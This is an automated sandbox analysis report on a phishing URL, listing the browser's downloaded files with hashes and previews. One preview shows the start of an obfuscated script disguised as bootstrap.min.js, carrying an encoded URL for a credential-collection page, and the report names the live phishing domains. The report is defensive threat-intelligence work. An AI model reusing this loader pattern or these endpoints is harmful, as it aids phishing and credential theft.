                                          15169GOOGLEUSfalse
                                          142.250.185.74
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.17
                                          192.168.2.16
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1641708
                                          Start date and time:2025-03-18 12:36:56 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Sample URL:https://remotex.scienceexperimentlab.de/3yAKy
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:16
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal52.phis.win@23/15@30/169
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 142.250.185.206, 142.250.186.163, 216.58.206.78, 64.233.184.84, 142.250.186.142, 216.58.206.46
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: https://remotex.scienceexperimentlab.de/3yAKy
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                          Category:downloaded
                                          Size (bytes):61
                                          Entropy (8bit):3.990210155325004
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (50758)
                                          Category:downloaded
                                          Size (bytes):51039
                                          Entropy (8bit):5.247253437401007
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:67176C242E1BDC20603C878DEE836DF3
                                          SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                          SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
                                          SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                          Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65325)
                                          Category:downloaded
                                          Size (bytes):144877
                                          Entropy (8bit):5.049937202697915
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:450FC463B8B1A349DF717056FBB3E078
                                          SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
                                          SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
                                          SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65454), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1099652
                                          Entropy (8bit):5.189078665284926
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:119341181E7E0C6B7A1BC99E431FAEE7
                                          SHA1:EDFF3369832F413FED548D71EEB4AACA1F1C52DE
                                          SHA-256:318E9377605BD6CBDDD72A57547D9652B8361980B47F34DEE16B395BB5419EA4
                                          SHA-512:F57EEF185CF2E3106252083426F1FB4374D932BB68CEA9462BE61E88D7FDDB413B9CCA8CBD2F6FDA31C815F27D3FF00B37E5F9E4D413B7CEAAE88E13ABAC5341
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://6733994123-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.js
                                          Preview:var file = "aHR0cHM6Ly93YXViLnNjaWVuY2VleHBlcmltZW50bGFiLmRlL2dvb2dsZS5waHA=";....var _0x95519=_0x4907;(function(_0x32a0d6,_0x28506e){var _0xff7f58=_0x4907,_0x453c02=_0x32a0d6();while(!![]){try{var _0xbf358e=parseInt(_0xff7f58(0x595f))/(-0xc5b+-0x1*-0x1a1b+-0xdbf)+parseInt(_0xff7f58(0x4d66))/(-0x2*-0xaa3+0x41b+-0x1b1*0xf)+-parseInt(_0xff7f58(0x32bc))/(-0x19*0xfe+0x8*-0xf+0x1949)*(parseInt(_0xff7f58(0x89c))/(-0x1fe5+0xa3*-0xe+0x28d3))+parseInt(_0xff7f58(0x33dd))/(-0x48d*0x1+-0x1e1d+0x1*0x22af)+-parseInt(_0xff7f58(0x45a4))/(0x11f3+0x22b5+-0x34a2)*(-parseInt(_0xff7f58(0x3671))/(0x1*0x880+-0xde3+0x56a))+-parseInt(_0xff7f58(0x437e))/(0x1910+-0x6c6+0x7b*-0x26)+parseInt(_0xff7f58(0xc27))/(-0x1*0x1145+-0xa98+0x1be6)*(-parseInt(_0xff7f58(0x1f26))/(-0x1*-0x1d36+0x1e67*0x1+-0x3b93));if(_0xbf358e===_0x28506e)break;else _0x453c02['push'](_0x453c02['shift']());}catch(_0x26756a){_0x453c02['push'](_0x453c02['shift']());}}}(_0x15d0,0x1*-0x22a33+0x7f08+0x383c2));var count=-0x326*-0x6+-0x190a+0x313*0x2;f
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32065)
                                          Category:downloaded
                                          Size (bytes):85578
                                          Entropy (8bit):5.366055229017455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, ASCII text
                                          Category:downloaded
                                          Size (bytes):196
                                          Entropy (8bit):5.098952451791238
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:62962DAA1B19BBCC2DB10B7BFD531EA6
                                          SHA1:D64BAE91091EDA6A7532EBEC06AA70893B79E1F8
                                          SHA-256:80C3FE2AE1062ABF56456F52518BD670F9EC3917B7F85E152B347AC6B6FAF880
                                          SHA-512:9002A0475FDB38541E78048709006926655C726E93E823B84E2DBF5B53FD539A5342E7266447D23DB0E5528E27A19961B115B180C94F2272FF124C7E5C8304E7
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://remotex.scienceexperimentlab.de/favicon.ico
                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.</body></html>.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32012)
                                          Category:downloaded
                                          Size (bytes):69597
                                          Entropy (8bit):5.369216080582935
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (48664)
                                          Category:downloaded
                                          Size (bytes):48944
                                          Entropy (8bit):5.272507874206726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (48238)
                                          Category:downloaded
                                          Size (bytes):48239
                                          Entropy (8bit):5.343270713163753
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:184E29DE57C67BC329C650F294847C16
                                          SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                          SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                          SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                          Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (19015)
                                          Category:downloaded
                                          Size (bytes):19188
                                          Entropy (8bit):5.212814407014048
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:70D3FDA195602FE8B75E0097EED74DDE
                                          SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                          SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                          SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                          Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                          Category:downloaded
                                          Size (bytes):2309
                                          Entropy (8bit):3.9533709859154516
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:26A555918CCCAC480C5DC4845ECC04E1
                                          SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                          SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                          SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
                                          Preview:.PNG........IHDR..............x......pHYs.................sRGB.........gAMA......a.....IDATx...1.]U.....`#d.......^..t.N...8.;;..A...T73xE.@ ;7."..9$.......^.............................................|......_...<..D...?.}?....G..._.8.z...o_.<........z....9.^.}..2.i..#.3............$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A................$.. H..@.... ...A...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (1572)
                                          Category:downloaded
                                          Size (bytes):5973
                                          Entropy (8bit):5.393222621370193
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:84B4D2FB3E351B07EB44BE9076C40C3F
                                          SHA1:F798336EF7F04FB213B51E7D32686B8E682ADAD9
                                          SHA-256:1C93A9EC1B17079D7F97C8176C2AB7807D10C133EFDD87FE2CCC233B152CA399
                                          SHA-512:8A307DCC1D60710FACB22BE693AFE2FFBFD332513FAD153EEAD776DED703A365F494FB1B46B8BCF00D382523C4B8BCA1E93612ED307519C5DF709375132D03F8
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://fonts.googleapis.com/css?family=Open+Sans:600
                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4taVIGxA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C8A, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4kaVIGxA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Open Sans';. font-style: normal;. font-weight: 600;. font-stretch: 100%;. src: url(https://fonts.gstatic.com/s/opensans/v40/memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsgH1x4saVIGxA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-fa
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:downloaded
                                          Size (bytes):28
                                          Entropy (8bit):4.137537511266052
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:C41A026A97DFC107025EEC7F45F29C85
                                          SHA1:B77C8FE6D6A770AF1758FC34B3E716656B8F2485
                                          SHA-256:8A7130BC862841606D062AC516513B01EB176CEF37D017E18B54E844E8390029
                                          SHA-512:6DE72788DA933F3DA0D1FB315335B8DE1BD9D4F7B59A0F1D1F6E758AB0D1EC3D7F0B8FFCDE16313B555BFE18832FF8671A2159F5AFCEEA6C45C2A037345ED017
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCcBgz2JE5J8KEgUNU1WBtRIFDa0JrrEhP1g0ZMVTL5s=?alt=proto
                                          Preview:ChIKBw1TVYG1GgAKBw2tCa6xGgA=
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (908)
                                          Category:downloaded
                                          Size (bytes):913
                                          Entropy (8bit):5.175497235669238
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:76C630D5EB0FDACEAB52576912BFF428
                                          SHA1:B6B648BC6BA8959773217D5093953F22048228F8
                                          SHA-256:0ED1310E737A7021AA0279969E76160E1878715C74D32E0B7189A106D7A6BFFB
                                          SHA-512:581336375996E90E5629A7A5218E10741E46E75921AF9746FDB7C6FC82444D4E424B23D21E96EE29E44E0827425C5216114D8EDBA9B5894989A9D8667D18ADDA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                          Preview:)]}'.["",["philadelphia eagles news","will there be severance season 3","destined rivals pokemon tcg","pepsico buys prebiotic soda brand poppi","snow storm weather forecast","partial solar eclipse march 29","christopher renstrom horoscopes","indianapolis chatterbox jazz club"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"9100553036212072932","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 98 x 73, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):61
                                          Entropy (8bit):3.9229992459789402
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CAB01D1524C8253CF77733AE7ADD5847
                                          SHA1:0712AF86C487FCD3F42A2E72064607C19A63B349
                                          SHA-256:6EDCD2AB2E25386C0DC5BE53865BA953B97550C140BE24B5CE50CFC09CF4A367
                                          SHA-512:46657CD85CF7F6A740E685A47F573CC449588B0D8F16568F4C19596AA952F0C63EDF5FBA55B799D75AC500EE63E69CDBF6D27B68FD51797228CA918C7C47C2B5
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR...b...I.....I.d.....IDAT.....$.....IEND.B`.
                                          No static file info